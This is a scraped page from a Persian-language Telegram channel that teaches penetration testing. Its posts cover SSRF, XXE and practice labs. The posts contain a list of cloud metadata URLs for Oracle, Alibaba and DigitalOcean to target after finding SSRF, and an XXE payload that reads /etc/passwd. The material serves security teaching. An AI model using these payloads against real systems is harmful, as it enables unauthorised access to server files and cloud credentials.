Try Hack Box
4.87K subscribers
572 photos
63 videos
79 files
602 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @Unique_exploitBot
ADS (Tablighat ) :
@THBADS
Download Telegram
☁️ آدرس منابع ابری برای دسترسی از طریق SSRF

هنگامی که SSRF را پیدا کردید، قدم بعدی شما این است که سعی کنید به منابع داخلی دسترسی داشته باشید و چیزی ارزشمند را در آنجا پیدا کنید.

و اگر نمونه ها و مقالات بسیار زیادی برای AWS وجود دارد، پس با سایر منابع ابری چه باید کرد؟ در زیر لیستی از URLهای جالب برای Oracle Cloud، Alibaba و Digital Ocean آمده است.

Oracle Cloud:

http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/
http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/

Alibaba :

http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id

Digital Ocean :

http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address

#Web #SSRF #Cloud
@TryHackBox
@TryHackBoxOfficial
🔥3
🔬 آزمایشگاه های رایگان برای تمرین عملیات SSRF

این لیست شامل آزمایشگاه‌های آنلاین و آزمایشگاه‌هایی است که می‌توانید در محیط آزمایشی خودتان اجرا کنید.

🗄 PortSwigger SSRF Labs
🗄 Server-Side Request Forgery (SSRF) vulnerable Lab
🗄 Vulnado SSRF Lab
🗄 Snyk SSRF Lab
🗄 Kontra SSRF Lab

#Web #SSRF
@TryHackBox
@TryHackBoxOfficial
👍3
Media is too big
VIEW IN TELEGRAM
🏃‍♂️ روش SSRF .

جریانی از KathanP19 ، اختصاص داده شده به روش جستجوی آسیب‌پذیری‌های SSRF در حالت دستی و خودکار.

جعل درخواست سمت سرور (SSRF) نوعی آسیب پذیری برنامه وب است که به مهاجم اجازه می دهد درخواست های HTTP دلخواه را از یک برنامه وب آسیب پذیر به یک سرور خارجی ارسال کند. یک برنامه را می توان فریب داد تا درخواست های مخرب را به سیستم های داخلی ارسال کند که می تواند منجر به افشای داده های حساس یا سایر مسائل امنیتی شود.

#SSRF #Web
@TryHackBox
@TryHackBoxOfficial
👍5
📌 حملات XXE (تزریق XML) - بخش اول

🔹حمله XXE چیست؟
حملۀ XXE (XML External Entity Injection) یک آسیب‌پذیری امنیتی در پردازش داده‌های XML است که به مهاجم اجازه می‌دهد به فایل‌های سیستم سرور دسترسی پیدا کند یا با سیستم‌های backend تعامل داشته باشد. در برخی موارد، این آسیب‌پذیری می‌تواند منجر به حمله‌های جعل درخواست سمت سرور (SSRF) یا حتی اختلال در سرویس (DoS) شود.

🔹 انواع حملات XXE
1. استخراج فایل‌ها (مثلاً خواندن /etc/passwd)
2. حملات SSRF (ارسال درخواست به سیستم‌های داخلی)
3. انتقال داده‌ها به صورت خارج از باند (OOB)
4. استخراج داده از طریق پیام‌های خطا

🔹 مثال ساده از XXE:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

در این مثال، مهاجم محتوای فایل /etc/passwd را می‌خواند.

ادامه در بخش بعدی...

✍️نویسنده
@TryHackBox | The Chaos

#XXE #SSRF #CyberSecurity
🔥41